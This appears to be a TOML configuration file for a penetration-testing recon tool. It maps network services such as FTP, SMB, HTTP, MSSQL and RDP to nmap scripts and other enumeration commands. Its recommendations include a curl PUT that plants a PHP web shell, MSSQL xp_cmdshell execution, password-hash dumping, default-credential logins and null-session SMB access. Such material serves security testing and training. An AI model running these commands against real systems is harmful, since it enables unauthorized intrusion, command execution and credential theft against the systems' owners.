
discover.txt

  1. [ftp] # 20, 21
  2. nmap-service-names = [
  3. "ftp",
  4. "ftp-data"
  5. ]
  6.  
  7. recommendations = [
  8. # none
  9. ]
  10.  
  11. [ftp.scans]
  12. nmap = "nmap -vv -Pn -p <ports> --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <target> -oN <fout>"
  13.  
  14.  
  15. [ssh] # 22
  16. nmap-service-names = [
  17. "ssh"
  18. ]
  19.  
  20. recommendations = [
  21. # none
  22. ]
  23.  
  24. [ssh.scans]
  25. nmap = "nmap -vv -Pn -p <ports> --script=ssh2-enum-algos,ssh-hostkey,ssh-auth-methods <target> -oN <fout>"
  26.  
  27.  
  28. [telnet] # 23
  29. nmap-service-names = [
  30. "telnet"
  31. ]
  32.  
  33. recommendations = [
  34. "telnet <target> <port>"
  35. ]
  36.  
  37. [telnet.scans]
  38. nmap = "nmap -vv -Pn -p <ports> --script=telnet-encryption,telnet-ntlm-info <target> -oN <fout>"
  39.  
  40.  
  41. [smtp] # 25
  42. nmap-service-names = [
  43. "smtp"
  44. ]
  45.  
  46. recommendations = [
  47. "telnet <target> <port>"
  48. ]
  49.  
  50. [smtp.scans]
  51. nmap = "nmap -vv -Pn -p <ports> --script=smtp-ntlm-info,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 <target> -oN <fout>"
  52. smtpuserenum = "smtp-user-enum -M VRFY -U <userlist> -t <target> 2>&1 | tee <fout>"
  53.  
  54.  
  55. [dns] # 53
  56. nmap-service-names = [
  57. "domain"
  58. ]
  59.  
  60. recommendations = [
  61. "nslookup"
  62. ]
  63.  
  64. [dns.scans]
  65. dnsrecon = "dnsrecon -t axfr <target> 2>&1 | tee <fout>"
  66. host = "host -t ns <target> 2>&1 | tee <fout>"
  67. nmap = "nmap -v -Pn -p <ports> --script=dns-service-discovery,dns-cache-snoop,dns-check-zone,dns-zone-transfer <target> -oN <fout>"
  68.  
  69.  
  70. [tftp] # 69
  71. nmap-service-names = [
  72. "tftp"
  73. ]
  74.  
  75. recommendations = [
  76. "tftp <target>:<port>"
  77. ]
  78.  
  79. [tftp.scans]
  80. nmap = "nmap -vv -sU -Pn -p <ports> --script=tftp-enum <target> -oN <fout>"
  81.  
  82.  
  83. [http] # 80, 591
  84. nmap-service-names = [
  85. "http",
  86. "http-alt"
  87. ]
  88.  
  89. recommendations = [
  90. "curl -v -X OPTIONS http://<target>:<port>/<directory>",
  91. "curl -v -X PUT -d '<?php echo shell_exec($_GET[\"cmd\"]);?>' http://<target>:<port>/<directory>/webshell.php",
  92. "dirb http://<target>:<port>/",
  93. "dotdotpwn -m http -h <target> -x <port> -f <pathtoretrieve> -k <keywordthatmustbepresent> -d <depth> -t <millisperrequest> -s",
  94. "wafw00f http://<target>:/<port>/",
  95. "nmap -Pn -p <ports> --script http-adobe-coldfusion-apsa1301,http-coldfusion-subzero,http-vuln-cve2009-3960,http-vuln-cve2010-2861 <target> -oN <fout>",
  96. "wpscan --url http://<target>:<port>/",
  97. "wpscan --url http://<target>:<port>/ --enumerate vp"
  98. ]
  99.  
  100. [http.scans]
  101. nikto = "nikto -host <target> -port <ports> 2>&1 | tee <fout>"
  102. nmap = "nmap -vv -Pn -p <ports> --script=http-vuln* <target> -oN <fout>"
  103. gobuster = "gobuster -e -w <wordlist> -u http://<target>:<port>/ 2>&1 | tee <fout>"
  104.  
  105.  
  106. [kerberos]
  107. nmap-service-names = [
  108. "kerberos",
  109. "kerberos-sec"
  110. ]
  111.  
  112. recommendations = [
  113. # none
  114. ]
  115.  
  116. [kerberos.scans]
  117. nmap = "nmap -vv -Pn -p <ports> --script=krb5-enum-users <target> -oN <fout>"
  118.  
  119.  
  120. [https] # 443
  121. nmap-service-names = [
  122. "https",
  123. "ssl/http",
  124. "ssl/http-alt"
  125. ]
  126.  
  127. recommendations = [
  128. # none
  129. ]
  130.  
  131. [https.scans]
  132. nikto = "nikto -host <target> -port <ports> -ssl 2>&1 | tee <fout>"
  133. nmap = "nmap -vv -Pn -p <ports> --script=ssl-ccs-injection,ssl-cert,ssl-date,ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle <target> -oN <fout>"
  134. gobuster = "gobuster -e -w <wordlist> -u https://<target>:<port>/ 2>&1 | tee <fout>"
  135.  
  136.  
  137. [pop3] # 110
  138. nmap-service-names = [
  139. "pop3"
  140. ]
  141.  
  142. recommendations = [
  143. "telnet <target> <port>"
  144. ]
  145.  
  146. [pop3.scans]
  147. nmap = "nmap -vv -Pn -p <ports> --script=pop3-capabilities,pop3-ntlm-info <target> -oN <fout>"
  148.  
  149.  
  150. [smb] # 139, 445
  151. nmap-service-names = [
  152. "microsoft-ds",
  153. "netbios-ssn"
  154. ]
  155.  
  156. recommendations = [
  157. "nmap -vv -sU --script=nbstat -p <ports> <target>",
  158. "crackmapexec smb <target> -u <user> -p <pass> --spider C\\$ --pattern <pattern>",
  159. "crackmapexec smb <target> -u '' -p ''",
  160. "crackmapexec smb <target> -u '' -p '' --local-auth",
  161. "smbclient -L <target>",
  162. "smbclient \\\\<target>\\<share>"
  163. ]
  164.  
  165. [smb.scans]
  166. "nmap.tcp" = "nmap -vv -Pn -p <ports> --script smb-vuln* <target> -oN <fout>"
  167. enum4linux = "enum4linux -a <target> 2>&1 | tee <fout>"
  168.  
  169.  
  170. [imap] # 143, 220, 585, 993
  171. nmap-service-names = [
  172. "imap",
  173. "imap3",
  174. "imap4-ssl",
  175. "imaps"
  176. ]
  177.  
  178. recommendations = [
  179. "telnet <target> <port>"
  180. ]
  181.  
  182. [imap.scans]
  183. nmap = "nmap -vv -Pn -p <ports> --script=imap-capabilities,imap-ntlm-info <target> -oN <fout>"
  184.  
  185.  
  186. [msrpc]
  187. nmap-service-names = [
  188. "epmap",
  189. "msrpc",
  190. "rpcbind",
  191. "sunrpc",
  192. "erpc"
  193. ]
  194.  
  195. recommendations = [
  196. "rpcclient -U '' <target>",
  197. "rpcinfo -p <target>",
  198. "showmount -e <target>"
  199. ]
  200.  
  201. [msrpc.scans]
  202. nmap = "nmap -vv -Pn -p <ports> --script=msrpc-enum <target> -oN <fout>"
  203.  
  204.  
  205. [snmp] # 161
  206. nmap-service-names = [
  207. "snmp"
  208. ]
  209.  
  210. recommendations = [
  211. # none
  212. ]
  213.  
  214. [snmp.scans]
  215. nmap = "nmap -vv -Pn -p <ports> --script=snmp-netstat,snmp-processes <target> -oN <fout>"
  216. onesixtyone = "onesixtyone <target> 2>&1 | tee <fout>"
  217. snmpwalk = "snmpwalk -c public -v1 <target> 2>&1 | tee <fout>"
  218.  
  219.  
  220. [ldap] # 389
  221. nmap-service-names = [
  222. "ldap"
  223. ]
  224.  
  225. recommendations = [
  226. # none
  227. ]
  228.  
  229. [ldap.scans]
  230. enum4linux = "enum4linux -l <target> 2>&1 | tee <fout>"
  231.  
  232.  
  233. [cups]
  234. nmap-service-names = [
  235. "ipp"
  236. ]
  237.  
  238. recommendations = [
  239. # none
  240. ]
  241.  
  242. [cups.scans]
  243. nmap = "nmap -vv -Pn -p <ports> --script=cups-info,cups-queue-info <target> -oN <fout>"
  244.  
  245.  
  246. [rmi] # 1033
  247. nmap-service-names = [
  248. "java-rmi",
  249. "rmiregistry"
  250. ]
  251.  
  252. recommendations = [
  253. # none
  254. ]
  255.  
  256. [rmi.scans]
  257. nmap = "nmap -vv -Pn -p <ports> --script=rmi-vuln-classloader,rmi-dumpregistry <target> -oN <fout>"
  258.  
  259.  
  260. [mssql] # 1433, 1434
  261. nmap-service-names = [
  262. "ms-sql",
  263. "ms-sql-s"
  264. ]
  265.  
  266. recommendations = [
  267. "nmap -vv -Pn -p <port> --script=ms-sql-dump-hashes --script-args='mssql.username=<user>,mssql.password=<password>,mssql.instance-port=<port>' <target>",
  268. "nmap -vv -Pn -p <port> --script ms-sql-xp-cmdshell --script-args='mssql.username=<user>,mssql.password=<password>,mssql.instance-port=<port>,ms-sql-xp-cmdshell.cmd=\"<cmd>\"' <target>",
  269. "sqsh -S <target>:<port> -U <user>"
  270. ]
  271.  
  272. [mssql.scans]
  273. nmap = "nmap -vv -Pn -p <ports> --script=ms-sql-config,ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info,ms-sql-ntlm-info,ms-sql-tables <target> -oN <fout>"
  274.  
  275.  
  276. [oracle] # 1521
  277. nmap-service-names = [
  278. "oracle",
  279. "oracle-tns"
  280. ]
  281.  
  282. recommendations = [
  283. # none
  284. ]
  285.  
  286. [oracle.scans]
  287. nmap = "nmap -vv -Pn -p <ports> --script=oracle-enum-users,oracle-tns-version <target> -oN <fout>"
  288.  
  289.  
  290. [mysql] # 3306
  291. nmap-service-names = [
  292. "mysql"
  293. ]
  294.  
  295. recommendations = [
  296. "mysql -u root -proot <target>"
  297. ]
  298.  
  299. [mysql.scans]
  300. nmap = "nmap -vv -Pn -p <ports> --script=mysql-variables,mysql-vuln-cve2012-2122,mysql-info,mysql-users,mysql-enum,mysql-databases,mysql-dump-hashes <target> -oN <fout>"
  301.  
  302.  
  303. [remotedesktop] # 3389
  304. nmap-service-names = [
  305. "ms-wbt-server",
  306. "msrdp"
  307. ]
  308.  
  309. recommendations = [
  310. "rdesktop -u Administrator -p administrator <target>:<port>"
  311. ]
  312.  
  313. [remotedesktop.scans]
  314. nmap = "nmap -vv -Pn -p <ports> --script=rdp-enum-encryption,rdp-vuln-ms12-020 <target> -oN <fout>"
  315.  
  316.  
  317. [vnc]
  318. nmap-service-names = [
  319. "vnc"
  320. ]
  321.  
  322. recommendations = [
  323. # none
  324. ]
  325.  
  326. [vnc.scans]
  327. nmap = "nmap -vv -Pn -p <ports> --script=vnc-info,vnc-title <target> -oN <fout>"